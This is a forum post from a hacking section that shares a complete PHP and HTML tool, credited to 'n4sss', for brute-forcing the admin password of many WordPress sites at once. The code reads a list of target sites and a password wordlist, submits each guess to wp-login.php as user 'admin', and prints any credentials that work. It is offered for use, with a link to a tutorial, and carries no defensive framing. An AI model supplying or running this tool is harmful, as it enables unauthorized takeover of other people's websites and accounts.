Jump to content
ilbr22

Wordpress Brute Force

By ilbr22, in Programe hacking

Recommended Posts

ilbr22 Newbie

ilbr22

Posted
Posted 

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Wp-bf
by n4sss</title>
</head>
<body
 style="background-image: url(http://www.freeimagehosting.net/newuploads/y14k7.jpg);">
<center>
<form method="post" action=""><span
 style="font-weight: bold; font-family: monospace; color: rgb(255, 255, 255);">w00rdpr3ss
Bf by n4sss</span><br
 style="font-family: monospace; color: rgb(255, 255, 255);">
  <span
 style="font-style: italic; font-family: monospace; color: rgb(255, 255, 255);"
 id="result_box" class="short_text" lang="en"><span
 class="hps">make</span>
  <span class="hps">simple,
make</span> <span
 class="hps">beautiful.</span></span><br>
  <textarea name="wpress" cols="36"
 rows="12"></textarea><br>
  <span style="font-weight: bold;"><br>
  <span
 style="font-family: monospace; color: rgb(255, 255, 255);">Passwords
: </span></span><br
 style="color: rgb(255, 255, 255);">
  <span
 style="font-family: monospace; color: rgb(255, 255, 255);">e.g:
word.txt</span><br>
  <input value="word.txt"
 name="password"><br>
  <p><input
 name="submit" value="Iniciar" type="submit">
  </p>
</form>
</center>
<?php /*
wp Bf By n4sss.
greetx : Status, chokoo, fl4m3, hackinho, anj0, shadow-ebr, xcholler.
2012
*/
ob_start();
error_reporting(0);
set_time_limit(0);
$listadesites=explode("\n",$_POST['wpress']);
foreach($listadesites as $slist){
$temiz=trim($slist);
$site=$temiz;
if(! $_POST['wpress']==""){
$pass=htmlspecialchars($_POST['password']);
foreach(file($pass)as $password){
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site.'/wp-login.php');
curl_setopt($curl,CURLOPT_COOKIEJAR,"c00ki3.txt");
curl_setopt($curl,CURLOPT_COOKIEFILE,"c00ki3.txt");
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,TRUE); curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=$password&wp-submit=Log+In&redirect_to=.$site./wp-admin/&testcookie=1");
$a = curl_exec($curl);
if(eregi ("profile.php",$a)){
echo '<center><big
 style="font-family: monospace; color: rgb(255, 255, 255);"><span
 style="font-weight: bold;">
'.$site.' SUCESSO: admin:'.$password.'</center></span></big>';
ob_flush();
flush();
}
}
}
}

//#EOF_
?>
</body>
</html>

tutorial: http://www.youtube.com/watch?v=Tk1wM6a-rTQ&feature=channel&list=UL

source: Wordpress Brute Force by n4sss - r00tsecurity

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...